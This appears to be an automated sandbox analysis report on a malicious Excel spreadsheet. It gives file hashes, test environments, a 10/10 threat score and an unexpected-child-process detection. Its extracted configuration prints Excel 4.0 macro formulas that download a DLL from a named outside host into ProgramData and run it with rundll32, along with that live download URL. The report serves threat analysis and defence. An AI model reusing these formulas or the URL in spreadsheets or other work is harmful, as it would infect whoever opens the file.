General
-
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.zip
-
Size
61KB
-
Sample
210304-lclhxp6vp6
-
MD5
b5102277fec5cf20132d3d542cf4648e
-
SHA1
40610a77a25e9ff604f7e6f9320e8dab8036a142
-
SHA256
876752ccf051c21b583d504ed35353b986a38545fc8feeb399fceb3efdf035f7
-
SHA512
eb45d4953505fe4552434c5a5fe666b4e8d83918245f31214b1c3b1ed6bb3b817f8e46725716982e4c835e55f7ab1903025672fee76e7299b5e003d86dd0dd32
Behavioral task
behavioral1
Sample
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
Resource
win10v20201028
Malware Config
Extracted
http://gveejlsffxmfjlswjmfm.com/files/april23.dll
-
formulas
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://gveejlsffxmfjlswjmfm.com/files/april23.dll","C:\ProgramData\todxofs.dll",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","rundll32.exe","C:\ProgramData\todxofs.dll,DllRegisterServer",0,0) =HALT()
Extracted
http://gveejlsffxmfjlswjmfm.com/files/april23.dll
Targets
-
-
Target
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908.xls
-
Size
76KB
-
MD5
228003634e57d37f08787be02c0b6c14
-
SHA1
0e71bb6f250012609c08adf74d1cec6587b6cc05
-
SHA256
49ed0e7aed118c46daed37f7d0eb62ab111cf6f9ab295b4b165ce82585539908
-
SHA512
5adcc817a196ef0cfc176d089564d8d87528e0a69134287b8858907a8e97040bdbc05b0b5d87db9a9856e641673c27effc3bed5f70754e87dbbef0d64dfa1375
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-